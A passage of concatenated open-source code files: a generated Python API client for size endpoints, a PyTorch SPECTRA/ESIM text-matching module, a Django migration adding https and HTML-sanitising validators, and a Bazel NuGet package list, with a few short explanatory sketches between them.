                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_sizes" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['HMAC', 'jwt']  # noqa: E501

        return self.api_client.call_api(
            '/v1/size', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[V1SizeResponse]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def update_size(self, body, **kwargs):  # noqa: E501
        """updates a size. if the size was changed since this one was read, a conflict is returned  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_size(body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param V1SizeUpdateRequest body: (required)
        :return: V1SizeResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.update_size_with_http_info(body, **kwargs)  # noqa: E501
        else:
            (data) = self.update_size_with_http_info(body, **kwargs)  # noqa: E501
            return data

    def update_size_with_http_info(self, body, **kwargs):  # noqa: E501
        """updates a size. if the size was changed since this one was read, a conflict is returned  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_size_with_http_info(body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param V1SizeUpdateRequest body: (required)
        :return: V1SizeResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method update_size" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `update_size`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['HMAC', 'jwt']  # noqa: E501

        return self.api_client.call_api(
            '/v1/size', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='V1SizeResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
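The docstrings above describe the `async_req=True` calling convention but not what the returned handle is. As a hedged, standalone sketch (not part of the generated client): generated clients of this style dispatch the request on a thread pool and return an async result whose blocking `.get()` yields the response. `MockSizeApi` and its canned return value are invented for illustration.

```python
from multiprocessing.pool import ThreadPool


class MockSizeApi:
    """Invented stand-in that mimics the generated client's async_req pattern."""

    def __init__(self):
        self._pool = ThreadPool(1)

    def list_sizes(self, async_req=False):
        if async_req:
            # Returns an AsyncResult; call .get() to block for the data.
            return self._pool.apply_async(self._do_list_sizes)
        return self._do_list_sizes()

    def _do_list_sizes(self):
        return ["c1-xlarge-x86"]  # canned response, for the sketch only


api = MockSizeApi()
thread = api.list_sizes(async_req=True)
result = thread.get()  # blocks until the "request" completes
```

The same shape explains why the docstrings show `thread = api.list_sizes(async_req=True)` followed by `result = thread.get()`.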
# File: rationalizers/modules/matchings.py (repo: deep-spin/spectra-rationalization, license: MIT)
import torch
from torch import nn
import torch.nn.functional as F
import ipdb
from torch.distributions import RelaxedOneHotCategorical

from rationalizers.modules.matchings_utils import submul, apply_multiple
from rationalizers.builders import build_sentence_encoder
from rationalizers.modules.sparsemap import (
    matching_smap,
    matching_smap_atmostone,
    matching_smap_atmostone_budget,
)


class LPSparseMAPFaithfulMatching(nn.Module):
    """
    ESIM model with SPECTRA strategies for extraction of the sparse alignment.
    For faithful alignments (the only information about the premise that the model
    has to make a prediction comes from the alignment and its masking of the encoded
    representation), turn the `faithful` flag on.
    """

    def __init__(
        self,
        embed: nn.Embedding = None,
        hidden_size: int = 200,
        dropout: float = 0.1,
        layer: str = "lstm",
        bidirectional: bool = True,
        temperature: float = 1.0,
        budget: float = 1.0,
        nonlinearity: str = "sigmoid",
        output_size: int = 1,
        matching_type: str = "AtMostONE",
        faithful: bool = True,
    ):
        super().__init__()
        self.faithful = faithful
        self.matching_type = matching_type
        emb_size = embed.weight.shape[1]
        enc_size = 2 * hidden_size if bidirectional else hidden_size
        self.embed_layer = nn.Sequential(embed, nn.Dropout(p=dropout))
        self.context_lstm = build_sentence_encoder(
            layer,
            emb_size,
            hidden_size,
            bidirectional=True,
        )
        self.z = None  # z samples
        self.temperature = temperature
        self.budget = budget
        if self.faithful:
            self.projection_x1 = nn.Sequential(
                nn.Linear(enc_size, hidden_size), nn.ReLU()
            )
            self.projection_x2 = nn.Sequential(
                nn.Linear(enc_size + enc_size, hidden_size), nn.ReLU()
            )
        else:
            self.projection = nn.Sequential(
                nn.Linear(4 * 2 * hidden_size, hidden_size), nn.ReLU()
            )
        self.composition_lstm = build_sentence_encoder(
            layer,
            hidden_size,
            hidden_size,
            bidirectional=True,
        )
        self.output_layer = nn.Sequential(
            nn.Dropout(p=dropout),
            nn.Linear(4 * enc_size, output_size),
            nn.Sigmoid() if nonlinearity == "sigmoid" else nn.LogSoftmax(dim=-1),
        )

    def forward(self, x1, x2, mask):
        """
        :param x1: premise embeddings
        :param x2: hypothesis embeddings
        :param mask: list [mask_x1, mask_x2] -- mask should be true/1 for valid positions, false/0 for invalid ones.
        """
        batch_size, _ = x1.shape
        lengths_x1 = mask[0].long().sum(1)
        lengths_x2 = mask[1].long().sum(1)
        mask_x1 = mask[0]
        mask_x2 = mask[1]
        emb_x1 = self.embed_layer(x1)  # [B, T, E]
        emb_x2 = self.embed_layer(x2)  # [B, D, E]

        # BiLSTM representation of the premise and hypothesis
        x1_h, _ = self.context_lstm(emb_x1, mask_x1, lengths_x1)
        x2_h, _ = self.context_lstm(emb_x2, mask_x2, lengths_x2)

        # [B, T, D]
        h_alignments = torch.bmm(x1_h, x2_h.transpose(1, 2))

        z = []
        for k in range(batch_size):
            scores = h_alignments[k] / self.temperature
            if self.matching_type == "AtMostONE":
                if self.training:
                    z_probs = matching_smap_atmostone(scores, max_iter=10)  # [T,D]
                else:
                    z_probs = torch.zeros(scores.shape, device=scores.device)
                    z_probs_sparsemap = matching_smap_atmostone(
                        scores[: lengths_x1[k], : lengths_x2[k]] / 1e-3, max_iter=1000
                    )
                    z_probs[: lengths_x1[k], : lengths_x2[k]] = z_probs_sparsemap
            if self.matching_type == "XOR-AtMostONE":
                if self.training:
                    z_probs = matching_smap(scores, max_iter=10)  # [T,D]
                else:
                    z_probs = torch.zeros(scores.shape, device=scores.device)
                    z_probs_sparsemap = matching_smap(
                        scores[: lengths_x1[k], : lengths_x2[k]] / 1e-3, max_iter=1000
                    )
                    z_probs[: lengths_x1[k], : lengths_x2[k]] = z_probs_sparsemap
            if self.matching_type == "AtMostONE-Budget":
                if self.training:
                    z_probs = matching_smap_atmostone_budget(
                        scores, max_iter=10, budget=self.budget
                    )  # [T,D]
                else:
                    z_probs = torch.zeros(scores.shape, device=scores.device)
                    z_probs_sparsemap = matching_smap_atmostone_budget(
                        scores[: lengths_x1[k], : lengths_x2[k]] / 1e-3,
                        max_iter=1000,
                        budget=self.budget,
                    )
                    z_probs[: lengths_x1[k], : lengths_x2[k]] = z_probs_sparsemap
            z_probs = z_probs * mask[1][k].unsqueeze(0)
            z_probs = z_probs * mask[0][k].unsqueeze(-1)
            z.append(z_probs)
        z = torch.stack(z, dim=0).squeeze(-1)  # [B, T, D]
        z = z.to(h_alignments.device)
        self.z = z

        x1_align = torch.matmul(z, x2_h)
        x2_align = torch.matmul(z.transpose(-1, -2), x1_h)

        if self.faithful:
            x1_combined = x1_align
            x2_combined = torch.cat([x2_h, x2_align], -1)
            x1_combined = self.projection_x1(x1_combined)
            x2_combined = self.projection_x2(x2_combined)
        else:
            x1_combined = torch.cat([x1_h, x1_align, submul(x1_h, x1_align)], -1)
            x2_combined = torch.cat([x2_h, x2_align, submul(x2_h, x2_align)], -1)
            x1_combined = self.projection(x1_combined)
            x2_combined = self.projection(x2_combined)

        x1_compose, _ = self.composition_lstm(x1_combined, mask_x1, lengths_x1)
        x2_compose, _ = self.composition_lstm(x2_combined, mask_x2, lengths_x2)

        x1_rep = apply_multiple(x1_compose)
        x2_rep = apply_multiple(x2_compose)

        x = torch.cat([x1_rep, x2_rep], -1)
        y_hat = self.output_layer(x)
        return z, y_hat


class GumbelFaithfulMatching(nn.Module):
    """
    The Matching Generator takes two input texts and returns samples from p(z|x1,x2)
    """

    def __init__(
        self,
        embed: nn.Embedding = None,
        hidden_size: int = 200,
        dropout: float = 0.1,
        layer: str = "lstm",
        bidirectional: bool = True,
        temperature: float = 1.0,
        nonlinearity: str = "sigmoid",
        output_size: int = 1,
        faithful: bool = True,
    ):
        super().__init__()
        self.faithful = faithful
        emb_size = embed.weight.shape[1]
        enc_size = 2 * hidden_size if bidirectional else hidden_size
        self.embed_layer = nn.Sequential(embed, nn.Dropout(p=dropout))
        self.context_lstm = build_sentence_encoder(
            layer,
            emb_size,
            hidden_size,
            bidirectional=True,
        )
        self.z = None  # z samples
        self.temperature = temperature
        if self.faithful:
            self.projection_x1 = nn.Sequential(
                nn.Linear(enc_size, hidden_size), nn.ReLU()
            )
            self.projection_x2 = nn.Sequential(
                nn.Linear(enc_size + enc_size, hidden_size), nn.ReLU()
            )
        else:
            self.projection = nn.Sequential(
                nn.Linear(4 * 2 * hidden_size, hidden_size), nn.ReLU()
            )
        self.composition_lstm = build_sentence_encoder(
            layer,
            hidden_size,
            hidden_size,
            bidirectional=True,
        )
        self.output_layer = nn.Sequential(
            nn.Dropout(p=dropout),
            nn.Linear(4 * enc_size, output_size),
            nn.Sigmoid() if nonlinearity == "sigmoid" else nn.LogSoftmax(dim=-1),
        )

    def forward(self, x1, x2, mask):
        """
        :param x1: premise embeddings
        :param x2: hypothesis embeddings
        :param mask: list [mask_x1, mask_x2] -- mask should be true/1 for valid positions, false/0 for invalid ones.
        """
        batch_size, _ = x1.shape
        lengths_x1 = mask[0].long().sum(1)
        lengths_x2 = mask[1].long().sum(1)
        mask_x1 = mask[0]
        mask_x2 = mask[1]
        emb_x1 = self.embed_layer(x1)  # [B, T, E]
        emb_x2 = self.embed_layer(x2)  # [B, D, E]

        # BiLSTM representation of the premise and hypothesis
        x1_h, _ = self.context_lstm(emb_x1, mask_x1, lengths_x1)
        x2_h, _ = self.context_lstm(emb_x2, mask_x2, lengths_x2)

        # [B, T, D]
        h_alignments = torch.bmm(x1_h, x2_h.transpose(1, 2))

        if not self.training:
            row_x1_probs = F.gumbel_softmax(
                h_alignments / 1e-6, tau=self.temperature, dim=1, hard=True
            )
            column_x2_probs = F.gumbel_softmax(
                h_alignments / 1e-6, tau=self.temperature, dim=2, hard=True
            )
        else:
            row_x1_probs = F.gumbel_softmax(h_alignments, tau=self.temperature, dim=1)
            column_x2_probs = F.gumbel_softmax(
                h_alignments, tau=self.temperature, dim=2
            )

        x1_align = torch.matmul(row_x1_probs, x2_h)
        x2_align = torch.matmul(column_x2_probs.transpose(-2, -1), x1_h)

        if self.faithful:
            x1_combined = x1_align
            x2_combined = torch.cat([x2_h, x2_align], -1)
            x1_combined = self.projection_x1(x1_combined)
            x2_combined = self.projection_x2(x2_combined)
        else:
            x1_combined = torch.cat([x1_h, x1_align, submul(x1_h, x1_align)], -1)
            x2_combined = torch.cat([x2_h, x2_align, submul(x2_h, x2_align)], -1)
            x1_combined = self.projection(x1_combined)
            x2_combined = self.projection(x2_combined)

        x1_compose, _ = self.composition_lstm(x1_combined, mask_x1, lengths_x1)
        x2_compose, _ = self.composition_lstm(x2_combined, mask_x2, lengths_x2)

        x1_rep = apply_multiple(x1_compose)
        x2_rep = apply_multiple(x2_compose)

        x = torch.cat([x1_rep, x2_rep], -1)
        y_hat = self.output_layer(x)
        z = [row_x1_probs, column_x2_probs]
        return z, y_hat


class ESIMFaithfulMatching(nn.Module):
    """
    The Matching Generator takes two input texts and returns samples from p(z|x1,x2)
    """

    def __init__(
        self,
        embed: nn.Embedding = None,
        hidden_size: int = 200,
        dropout: float = 0.1,
        layer: str = "lstm",
        bidirectional: bool = True,
        temperature: float = 1.0,
        nonlinearity: str = "sigmoid",
        output_size: int = 1,
        faithful: bool = True,
    ):
        super().__init__()
        self.faithful = faithful
        emb_size = embed.weight.shape[1]
        enc_size = 2 * hidden_size if bidirectional else hidden_size
        self.embed_layer = nn.Sequential(embed, nn.Dropout(p=dropout))
        self.context_lstm = build_sentence_encoder(
            layer,
            emb_size,
            hidden_size,
            bidirectional=True,
        )
        self.z = None  # z samples
        self.temperature = temperature
        if self.faithful:
            self.projection_x1 = nn.Sequential(
                nn.Linear(enc_size, hidden_size), nn.ReLU()
            )
            self.projection_x2 = nn.Sequential(
                nn.Linear(enc_size + enc_size, hidden_size), nn.ReLU()
            )
        else:
            self.projection = nn.Sequential(
                nn.Linear(4 * 2 * hidden_size, hidden_size), nn.ReLU()
            )
        self.composition_lstm = build_sentence_encoder(
            layer,
            hidden_size,
            hidden_size,
            bidirectional=True,
        )
        self.output_layer = nn.Sequential(
            nn.Dropout(p=dropout),
            nn.Linear(4 * enc_size, output_size),
            nn.Sigmoid() if nonlinearity == "sigmoid" else nn.LogSoftmax(dim=-1),
        )

    def forward(self, x1, x2, mask):
        batch_size, _ = x1.shape
        lengths_x1 = mask[0].long().sum(1)
        lengths_x2 = mask[1].long().sum(1)
        mask_x1 = mask[0]
        mask_x2 = mask[1]
        emb_x1 = self.embed_layer(x1)  # [B, T, E]
        emb_x2 = self.embed_layer(x2)  # [B, D, E]

        # BiLSTM representation of the premise and hypothesis
        x1_h, _ = self.context_lstm(emb_x1, mask_x1, lengths_x1)
        x2_h, _ = self.context_lstm(emb_x2, mask_x2, lengths_x2)

        # [B, T, D]
        h_alignments = torch.bmm(x1_h, x2_h.transpose(1, 2))

        row_x1_probs = F.softmax(h_alignments, dim=1)
        column_x2_probs = F.softmax(h_alignments, dim=2)

        x1_align = torch.matmul(row_x1_probs, x2_h)
        x2_align = torch.matmul(column_x2_probs.transpose(-2, -1), x1_h)

        if self.faithful:
            x1_combined = x1_align
            x2_combined = torch.cat([x2_h, x2_align], -1)
            x1_combined = self.projection_x1(x1_combined)
            x2_combined = self.projection_x2(x2_combined)
        else:
            x1_combined = torch.cat([x1_h, x1_align, submul(x1_h, x1_align)], -1)
            x2_combined = torch.cat([x2_h, x2_align, submul(x2_h, x2_align)], -1)
            x1_combined = self.projection(x1_combined)
            x2_combined = self.projection(x2_combined)

        x1_compose, _ = self.composition_lstm(x1_combined, mask_x1, lengths_x1)
        x2_compose, _ = self.composition_lstm(x2_combined, mask_x2, lengths_x2)

        x1_rep = apply_multiple(x1_compose)
        x2_rep = apply_multiple(x2_compose)

        x = torch.cat([x1_rep, x2_rep], -1)
        y_hat = self.output_layer(x)
        z = [row_x1_probs, column_x2_probs]
        return z, y_hat
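All three classes above share one soft-alignment step: a premise/hypothesis similarity matrix is normalised with a softmax along each axis, and the resulting attention weights mix the other sentence's encoded states. A minimal, unbatched NumPy sketch of that step (NumPy stands in for torch here; the toy shapes and random states are invented for illustration):

```python
import numpy as np


def softmax(x, axis):
    # Numerically stable softmax along the given axis.
    e = np.exp(x - x.max(axis=axis, keepdims=True))
    return e / e.sum(axis=axis, keepdims=True)


T, D, H = 3, 4, 5                     # premise length, hypothesis length, hidden size
rng = np.random.default_rng(0)
x1_h = rng.normal(size=(T, H))        # encoded premise states
x2_h = rng.normal(size=(D, H))        # encoded hypothesis states

h_alignments = x1_h @ x2_h.T          # [T, D] similarity scores

row_probs = softmax(h_alignments, axis=1)   # weights over hypothesis positions
col_probs = softmax(h_alignments, axis=0)   # weights over premise positions

x1_align = row_probs @ x2_h           # [T, H] hypothesis summary per premise token
x2_align = col_probs.T @ x1_h         # [D, H] premise summary per hypothesis token
```

The SPECTRA and Gumbel variants replace the plain softmax with a SparseMAP matching or a Gumbel-softmax sample, but the shapes and the mixing step stay the same.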
# File: agreements/migrations/0002_auto_20201121_0305.py (repo: cu-library/mellyn, license: MIT)
# Generated by Django 3.1.3 on 2020-11-21 03:05
import django.core.validators
from django.db import migrations, models
import django_bleach.models


class Migration(migrations.Migration):

    dependencies = [
        ('agreements', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='agreement',
            name='body',
            field=django_bleach.models.BleachField(help_text='HTML content of the agreement. The following tags are allowed: h3, p, a, abbr, cite, code, small, em, strong, sub, sup, u, ul, ol, li, br. Changing this field after the agreement has been signed by patrons is strongly discouraged.'),
        ),
        migrations.AlterField(
            model_name='agreement',
            name='redirect_url',
            field=models.URLField(help_text="URL displayed to patrons after signing the agreement. It is prefixed by the text 'Return to '. It must start with 'https://'.", validators=[django.core.validators.URLValidator(code='need_https', message="Enter a valid URL. It must start with 'https://'.", schemes=['https'])]),
        ),
        migrations.AlterField(
            model_name='historicalagreement',
            name='body',
            field=django_bleach.models.BleachField(help_text='HTML content of the agreement. The following tags are allowed: h3, p, a, abbr, cite, code, small, em, strong, sub, sup, u, ul, ol, li, br. Changing this field after the agreement has been signed by patrons is strongly discouraged.'),
        ),
        migrations.AlterField(
            model_name='historicalagreement',
            name='redirect_url',
            field=models.URLField(help_text="URL displayed to patrons after signing the agreement. It is prefixed by the text 'Return to '. It must start with 'https://'.", validators=[django.core.validators.URLValidator(code='need_https', message="Enter a valid URL. It must start with 'https://'.", schemes=['https'])]),
        ),
        migrations.AlterField(
            model_name='historicalresource',
            name='description',
            field=django_bleach.models.BleachField(blank=True, help_text='An HTML description of the resource. The following tags are allowed: h3, p, a, abbr, cite, code, small, em, strong, sub, sup, u, ul, ol, li, br.'),
        ),
        migrations.AlterField(
            model_name='historicalresource',
            name='low_codes_email',
            field=models.CharField(blank=True, help_text='The recipient of email warnings about low numbers of remaining unassigned license codes. If empty, no emails are sent.', max_length=200, validators=[django.core.validators.EmailValidator()]),
        ),
        migrations.AlterField(
            model_name='resource',
            name='description',
            field=django_bleach.models.BleachField(blank=True, help_text='An HTML description of the resource. The following tags are allowed: h3, p, a, abbr, cite, code, small, em, strong, sub, sup, u, ul, ol, li, br.'),
        ),
        migrations.AlterField(
            model_name='resource',
            name='low_codes_email',
            field=models.CharField(blank=True, help_text='The recipient of email warnings about low numbers of remaining unassigned license codes. If empty, no emails are sent.', max_length=200, validators=[django.core.validators.EmailValidator()]),
        ),
    ]
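The migration above tightens `redirect_url` with `URLValidator(schemes=['https'])`, so only https URLs validate. A hedged sketch of that scheme check using only the standard library (Django is not required here; `needs_https` is an invented helper name):

```python
from urllib.parse import urlparse


def needs_https(url: str) -> bool:
    """Return True if the URL uses the https scheme, mirroring the intent of
    URLValidator(schemes=['https']) in the migration above."""
    return urlparse(url).scheme == "https"


print(needs_https("https://example.org/agreement"))  # True
print(needs_https("http://example.org/agreement"))   # False
```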
# File: sdk/lusid_drive/utilities/__init__.py (repo: fossabot/drive-sdk-python-preview, license: MIT)
from lusid_drive.utilities.api_client_builder import ApiClientBuilder
from lusid_drive.utilities.api_configuration_loader import ApiConfigurationLoader
from lusid_drive.utilities.refreshing_token import RefreshingToken
from lusid_drive.utilities.api_client_factory import ApiClientFactory
from lusid_drive.utilities.lusid_drive_retry import lusid_drive_retry
from lusid_drive.utilities.proxy_config import ProxyConfig
from lusid_drive.utilities.api_configuration import ApiConfiguration
from lusid_drive.utilities.utility_functions import get_file_id
from lusid_drive.utilities.utility_functions import get_folder_id
# File: label_colours.py (repo: KevinLL218/Mydatabase, license: MIT)
label_colours = [(0, 0, 0),
                 (0, 128, 0),
                 (128, 0, 0)]
# File: nugets.bzl (repo: tomaszstrejczek/rules_dotnet_3rd_party, license: Apache-2.0)
load("@io_bazel_rules_dotnet//dotnet/private:rules/nuget.bzl", "nuget_package")
def repositories_nugets():
### Generated by the tool
nuget_package(
name = "microsoft.extensions.filesystemglobbing",
package = "microsoft.extensions.filesystemglobbing",
version = "3.1.3",
sha256 = "15ff566cbf79a964269711cb4b1000187ce9bd18a5292363ca55d00ff91a28a5",
core_lib = {
"netcoreapp2.0": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"netcoreapp2.1": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"netcoreapp3.0": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"netcoreapp3.1": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
},
net_lib = {
"net461": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"net462": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"net47": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"net471": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"net472": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"net48": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"netstandard2.0": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"netstandard2.1": "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
},
mono_lib = "lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
core_files = {
"netcoreapp2.0": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
"netcoreapp2.1": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
"netcoreapp3.0": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
"netcoreapp3.1": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
},
net_files = {
"net461": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
"net462": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
"net47": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
"net471": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
"net472": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
"net48": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
"netstandard2.0": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
"netstandard2.1": [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
},
mono_files = [
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.dll",
"lib/netstandard2.0/Microsoft.Extensions.FileSystemGlobbing.xml",
],
)
nuget_package(
name = "newtonsoft.json",
package = "newtonsoft.json",
version = "9.0.1",
sha256 = "998081ae052120917346e2cb57d488888147a2fcdf47c52ea9f83a7b4f049e55",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netcoreapp2.1": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netcoreapp3.0": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netcoreapp3.1": "lib/netstandard1.0/Newtonsoft.Json.dll",
},
net_lib = {
"net45": "lib/net45/Newtonsoft.Json.dll",
"net451": "lib/net45/Newtonsoft.Json.dll",
"net452": "lib/net45/Newtonsoft.Json.dll",
"net46": "lib/net45/Newtonsoft.Json.dll",
"net461": "lib/net45/Newtonsoft.Json.dll",
"net462": "lib/net45/Newtonsoft.Json.dll",
"net47": "lib/net45/Newtonsoft.Json.dll",
"net471": "lib/net45/Newtonsoft.Json.dll",
"net472": "lib/net45/Newtonsoft.Json.dll",
"net48": "lib/net45/Newtonsoft.Json.dll",
"netstandard1.0": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard1.1": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard1.2": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard1.3": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard1.4": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard1.5": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard1.6": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard2.0": "lib/netstandard1.0/Newtonsoft.Json.dll",
"netstandard2.1": "lib/netstandard1.0/Newtonsoft.Json.dll",
},
mono_lib = "lib/net45/Newtonsoft.Json.dll",
core_files = {
"netcoreapp2.0": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netcoreapp2.1": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netcoreapp3.0": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netcoreapp3.1": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
},
net_files = {
"net45": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"net451": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"net452": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"net46": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"net461": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"net462": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"net47": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"net471": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"net472": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"net48": [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netstandard1.0": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netstandard1.1": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netstandard1.2": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netstandard1.3": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netstandard1.4": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netstandard1.5": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netstandard1.6": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netstandard2.0": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
"netstandard2.1": [
"lib/netstandard1.0/Newtonsoft.Json.dll",
"lib/netstandard1.0/Newtonsoft.Json.xml",
"tools/install.ps1",
],
},
mono_files = [
"lib/net45/Newtonsoft.Json.dll",
"lib/net45/Newtonsoft.Json.xml",
"tools/install.ps1",
],
